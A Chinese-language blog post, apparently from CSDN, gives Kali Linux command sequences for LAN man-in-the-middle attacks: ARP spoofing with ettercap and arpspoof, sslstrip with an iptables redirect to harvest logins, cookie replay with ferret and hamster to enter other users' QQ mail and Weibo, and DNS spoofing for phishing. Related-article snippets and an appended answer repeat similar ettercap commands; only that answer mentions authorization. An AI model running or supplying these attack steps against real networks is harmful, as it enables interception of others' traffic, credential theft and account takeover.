arp欺骗 DNS欺骗 会话劫持

最新推荐文章于 2025-07-16 14:19:05 发布
原创 最新推荐文章于 2025-07-16 14:19:05 发布 · 1.7k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#Kali linux

【1】局域网中嗅探钓鱼 攻击arp欺骗 DNS欺骗 会话劫持
(1)arp欺骗–ettercap 相关文章http://www.91ri.org/4408.html
kali linux:
1.修改
vim /etc/NetworkManager/NetworkManager.conf
managed=true
重启网卡 service network-mannager restart
2.修改ettercap配置文件
vim /etc/ettercap/etter.conf
ec_uid=0 ec_gid=0
将iptables注释打开,如下在这里插入图片描述
echo 1>>/proc/sys/net/ipv4/ip_forward //ip转发功能开启
ettercap -i eth0 -Tq(文本和安静模式下) -M arp:remote /192.168.81.20/ /192.168.81.1/
// //监听所有网段 捕获敏感数据(网址和账号和密码)
输入参数 L ,1
drifnet -i eth0 嗅探图片访问工具
(2)arp欺骗–arpspoof
echo 1>>/proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.81.1(网关) 192.168.81.132(本机)
drifnet -i eth0 嗅探图片访问工具
`数据包捕获 tcpdump wireshark drafnet(自动化工具)
tcpdump -i eth0 -w 123 .dump
(3)SSL数据嗅探
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(设置)
sslstrip -p -l 10000 -w log.txt
ettercap -i eth0 -Tq(文本和安静模式下) -M arp:remote // //
然后通过网段其他电脑的登录需要输入账号和密码的网站登录
(4)session劫持-arp欺骗
tcpdump -i eth0 -w qq.cap
ferret -r qq.cap(32位有此插件 64位需单独安装)
hamster
浏览器设置代理 hamster 127.0.0.1 1234
http://hamster(可以查看到qq.cap内的cooke,找到链接直接进入qq邮箱和微博)
选择目标
测试session
iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(删除)
/etc/source.list(64位kailinux 无ferret工具此方法安装)
在这里插入图片描述
在这里插入图片描述
(5)session劫持-DNS欺骗(钓鱼攻击)
ettercap -i eth0 -Tq(文本和安静模式下) -M arp:remote // //
1.使用ettercap进行arp欺骗,vim /etc/ettercap
192.168.14.132为kailnux本机ip地址在这里插入图片描述
2.修改etter.dns文件 vim /etc/ettercap/etter.dns
3.启用dns_spoof(在执行ettercap命令后输入),激活需要几分钟时间
4.测试dns劫持是否成功
在这里插入图片描述

ARP欺骗&DNS劫持
Johnathan的博客
02-03 913
ping ip //ping主机是否连通 fping -aqg ip/掩码 nmap -sP 192.168.0.1/2 //获得主机列表,192.168.0.1/24”表示扫描"192.168.0.1-192.168.0.254"这个网段内所有的主机。 route -n //查看网关 ifconfig //查看网卡接口 arpspoof -i eth0 -t 192.168.0.129 -r 192.168.0.2 //arp欺骗 -i 表示网卡接口,-t 表示目标地址,-r 表示网关 ...
Android中Https通信实现_中间人攻击、DNS欺骗会话劫持
renzhongrui的博客
12-26 1295
上一篇文章记述了在Android中使用Https进行单向认证的配置,但单向认证存在中严重的安全漏洞,其中最容易受到中间人攻击和DNS欺骗,本文主要讲述进行中间人攻击和DNS欺骗的方式。 概览 中间人攻击 DNS欺骗 ...
kaliarp欺骗session会话劫持
赵一舟的博客
02-08 4367
基于arp欺骗的session劫持 开启ettercap arp监听后 开启打开一个终端,输入driftnet -i wlan0 测试下arp欺骗正常没 TcpDump可以将网络中传送的数据包完全截获下来提供分析 捕获数据包命令,重新开启命令行 tcpdump -i wlan0 -w text1.cap 让受害者打开个邮箱或者微博等,登陆成功后停止tcpdump,然后在
实战揭秘:ARP欺骗如何“劫持”你的网络
最新发布
xx16755498986的博客
07-16 689
arp欺骗基于arp协议,当请求主机需要访问另一个网段的主机时,需要检查相应的arp缓存表中有无对应的ip与mac地址,若没有,请求主机则会在网段中广播arp请求报文,当网关收到arp请求报文后,会单播发送arp回应报文来告诉请求主机网关的mac地址,当请求主机收到arp回应报文后,会在arp缓存表中记录相应的ip与mac地址,然后直接访问网关,网关再去访问下一个网段:主机型arp欺骗是把攻击主机伪装成网关,让被攻击主机误认为攻击主机为网关,向攻击主机发送请求,此时被攻击主机将会被丢包,无法访问网络。
2.9 ARPDNS欺骗
qq_55202378的博客
07-18 1587
ARP欺骗 DNS欺骗
arp欺骗dns欺骗
m0_62207170的博客
11-24 810
web安全
嗅探,arp欺骗会话劫持与重放攻击
wjy397的专栏
12-03 4233
http://blog.chinaunix.net/uid-26349264-id-3251986.html 前言 嗅探,arp欺骗会话劫持与重放攻击之间的关系可谓相辅相成,这次针对web安全把它们放在一起来讲解。 10.1 Sniffer Sniffer(嗅探器)程序是一种利用以太网的特性把网络适配卡(NIC,一般为以太网卡)置为杂乱(promiscuous)模式状态的工具
ARP欺骗基础:ARP欺骗的常见应用场景.docxARP欺骗基础:ARP欺骗的常见应用场景all.docxARP欺骗基础:ARP欺骗的常见应用场景-(10).利用ARP欺骗进行会话劫持.docx
08-31
利用ARP欺骗进行会话劫持.docx ARP欺骗基础:ARP欺骗的常见应用场景_(11).ARP欺骗在嗅探攻击中的应用.docx ARP欺骗基础:ARP欺骗的常见应用场景_(12).ARP欺骗DNS欺骗中的辅助作用.docx ARP欺骗基础:ARP欺骗的...
Web安全实践(13)嗅探,arp欺骗,会话劫持与重放攻击整理.pdf
11-18
Web 安全实践(嗅探、ARP 欺骗会话劫持与重放攻击) 本文将详细介绍 Web 安全实践中的一些重要概念,包括嗅探、ARP 欺骗会话劫持和重放攻击等。 1. 嗅探(Sniffer) 嗅探是一种利用以太网特性的工具,可以将...
Web安全揭秘:嗅探、ARP欺骗会话劫持风险
Web安全实践(13)主要探讨了网络嗅探、ARP欺骗会话劫持这两种常见的网络安全威胁,以及它们对Web应用程序和用户隐私的影响。 1. 网络嗅探(Sniffer) Sniffer是一种网络监测工具,通过将网络接口设置为“混杂”...
ARP欺骗、ICMP重定向、DNS欺骗对比
微醺半夏的博客
06-05 1027
ARP欺骗、ICMP重定向、DNS欺骗对比 攻击成因 利用方法 攻击效果 攻击限制 ARP 欺骗 利用ARP协议的无状态性,通过捏造不存在的MAC地址更新操作系统ARP路 由缓存表。 发送伪造的发送者MAC地址的ARP请求。或者发送伪造的发送者MAC地址的ARP应答,使被攻击主机自动更新其AR...
内网安全-arp欺骗dns劫持钓鱼
weixin_58782362的博客
11-05 1134
攻击机一直发送伪造的数据包,欺骗网关自己是靶机,欺骗靶机自己是网关,同时开启路由转发功能,就可以让靶机在正常上网的情况下截获网络数据包,所有数据都会经过攻击机再转发给靶机。攻击机伪造数据包后本应该传输给靶机的数据错误的传输给攻击机,使靶机得不到服务器的响应数据,甚至根本无法将数据包发送出局域网。在设置的规则中,记住选择有可能解析的域名,将三级域名解析成二级域名。arpspoof -i enth -t 目标 -r 网卡。dns劫持,在arp欺骗的基础上面进行劫持。使用ettercap kali自带。
网络攻防之ARP欺骗DNS劫持实验
m0_62574258的博客
02-24 3311
实验环境:攻击主机:kali2023虚拟机,IP地址为192.168.133.141靶机:Windows10虚拟机,IP地址为192.168.133.129网关地址:192.168.133.2(1)ARP协议介绍在以太网中,一个主机要和另一个主机进行直接通信,必须要知道目标主机的MAC地址。这个目标主机的MAC地址就是通过地址解析协议ARP获得的。ARP协议中通常有两种数据包:ARP请求包和ARP应答包。
dns劫持arp攻击简介
文思源想的技术空间
11-22 803
1 dns劫持 域名系统(英文:Domain Name System,缩写:DNS)是互联网的一项服务。它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网。DNS使用TCP和UDP端口53。当前,对于每一级域名长度的限制是63个字符,域名总长度则不能超过253个字符。 2 arp攻击 ARP(地址解析协议)是在仅知道主机的IP地址时确定其物理地址的一种协议,其主要用作将IP地址翻译为以太网的MAC地址,但其也能在ATM和FDDI IP网络中使用。 ARP攻击主要是存在于
ARP劫持攻击(实验寒假补)
xiaoka__的博客
12-14 4323
1.防范ARP攻击的方法: 防范方法写在最前面 1.静态绑定(ip和Mac地址) cmd下arp -s命令: arp -s ip地址 Mac地址 2.安装ARP防火墙 如金山防火墙,彩影防火墙等。 2.ARP全称Address Resolution Protocol(地址解析协议) 3.ARP协议(地址解析协议的功能): 主机在发送数据之前将目标ip转换为MAC地址,完成网络地址到物理地址的映射,以保证两台主机之间能正常通信。 重点:必须知道MAC地址才能通信,只知道IP地址不行。 4.原理: 局域网内每
20222922 2022-2023-2 《网络攻防实践》 第4周作业
qq_21274765的博客
03-22 590
ARP欺骗ARP spoofing),又称ARP毒化(ARP poisoning,网络上多译为ARP病毒)或ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术,通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网络上特定计算机或所有计算机无法正常连线。ARP欺骗的运作原理是由攻击者发送假的ARP数据包到网上,尤其是送到网关上。
kali linux(ARP欺骗+cookie会话劫持)
张恒的博客
04-22 1537
ARP欺骗+cookie会话劫持一.环境搭建1.下载arpspoof2.下载ferret3.下载hamster二.开始ARP欺骗1.查找目标机2.开启流量转发3.开始ARP欺骗4.开始抓包5.freeter工具重写6.hamster重放7.开启浏览器代理 一.环境搭建 1.下载arpspoof apt install dsniff 2.下载ferret dpkg --add-architecture i386 apt-get clean apt-get update sudo apt install f
局域网下ARP欺骗以及DNS劫持
白菜博客
04-15 1060
终端输入命令ettercap -G进入ettercap的GUI界面,选择Unified sniffing(Ctrl H),然后在弹出的选项中选择eth0(如果你有无线网卡可以选择wlan0)这个一般不用修改,视情况而定,选择自己正确挂载的网卡即可。这就是DNS欺骗的基本原理。域名劫持是互联网攻击的一种方式,通过攻击域名解析服务器(DNS),或伪造域名解析服务器(DNS)的方法,把目标网站域名解析到错误的地址从而实现用户无法访问目标网站的目的。只要打开网页,DNS都会映射到攻击机的IP上,淫荡的任你玩弄!
ARP欺骗DNS劫持以及Wireshark分析
m0_59302403的博客
04-02 5721
利用ettercap进行中间人攻击之ARP欺骗DNS劫持,用Wireshark分析相关特征数据,提高对ettercap、Wireshark的熟练度,同时也对中间人攻击有更加深入的认识。
ettercap会话劫持DNS欺骗心得
06-09
### Ettercap在会话劫持DNS欺骗中的使用方法和技巧 #### 一、Ettercap概述 Ettercap 是一款功能强大的网络嗅探工具,支持多种攻击方式,包括 ARP 欺骗DNS 欺骗会话劫持等[^1]。它通过中间人攻击(Man-in-the-Middle, MITM)技术实现对目标网络流量的拦截和篡改。 --- #### 二、会话劫持(Session Hijacking) 会话劫持是指攻击者通过某种手段获取用户的合法会话信息(如 Cookie 或 Session ID),从而冒充用户的身份进行操作。以下是使用 Ettercap 进行会话劫持的技术细节: 1. **环境准备** - 确保 Kali Linux 已安装 Ettercap 和 Apache2。 - 开启 IP 转发功能以避免断网攻击: ```bash echo 1 > /proc/sys/net/ipv4/ip_forward ``` - 启动 Apache2 服务用于模拟攻击服务器: ```bash service apache2 restart ``` 2. **配置 Ettercap** 编辑 Ettercap 配置文件以启用插件: ```bash sudo vi /etc/ettercap/etter.conf ``` 注释掉 `redir_command_on` 和 `redir_command_off` 的相关行,确保流量重定向正常工作[^1]。 3. **执行会话劫持命令** 使用以下命令启动 Ettercap 并进行 ARP 欺骗: ```bash ettercap -i eth0 -Tq -M arp:remote -P http_header /被攻击者IP// /网关IP// ``` 参数说明: - `-i eth0`:指定网卡。 - `-Tq`:文本模式和安静模式。 - `-M arp:remote`:执行远程 ARP 欺骗。 - `-P http_header`:启用 HTTP 头部分析插件,捕获敏感信息如 Cookies[^2]。 4. **捕获会话信息** 在 Ettercap 图形化界面中,选择目标主机并查看其会话数据包,提取关键的会话标识符(如 Cookie)[^1]。 --- #### 三、DNS欺骗DNS Spoofing) DNS 欺骗是通过伪造 DNS 响应,将用户请求的目标域名解析为攻击者的 IP 地址,从而实现流量劫持[^3]。以下是使用 Ettercap 进行 DNS 欺骗的具体步骤: 1. **修改 Ettercap DNS 配置文件** 编辑 `/etc/ettercap/etter.dns` 文件,添加自定义的 DNS 映射规则: ```bash sudo vi /etc/ettercap/etter.dns ``` 添加以下内容: ``` www.target.com A <攻击者IP> *.target.com A <攻击者IP> ``` 将目标域名解析到攻击者的 IP 地址[^4]。 2. **启动 DNS 欺骗攻击** 使用以下命令启动 Ettercap 并加载 DNS 欺骗插件: ```bash ettercap -i eth0 -Tq -M arp:remote -P dns_spoof /被攻击者IP// /网关IP// ``` 参数说明与会话劫持类似,但额外启用了 `-P dns_spoof` 插件[^2]。 3. **验证效果** 让靶机访问目标域名(如 `www.target.com`),观察是否成功跳转到攻击者的服务器页面[^4]。 --- #### 四、注意事项 - **法律合规性**:仅在授权环境下进行测试,避免非法行为。 - **流量转发**:确保开启 IP 转发功能,否则可能导致目标主机断网。 - **日志记录**:Ettercap 会生成详细的日志文件,可用于后续分析。 --- ### 示例代码 以下是一个简单的 Python 脚本,用于自动化检测目标主机的 DNS 解析结果: ```python import socket def check_dns_resolution(domain, expected_ip): try: resolved_ip = socket.gethostbyname(domain) if resolved_ip == expected_ip: print(f"[+] {domain} resolves to {resolved_ip}") else: print(f"[-] {domain} resolves incorrectly to {resolved_ip}") except Exception as e: print(f"Error resolving {domain}: {e}") # 测试目标域名 check_dns_resolution("www.target.com", "192.168.1.100") ``` --- ####
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值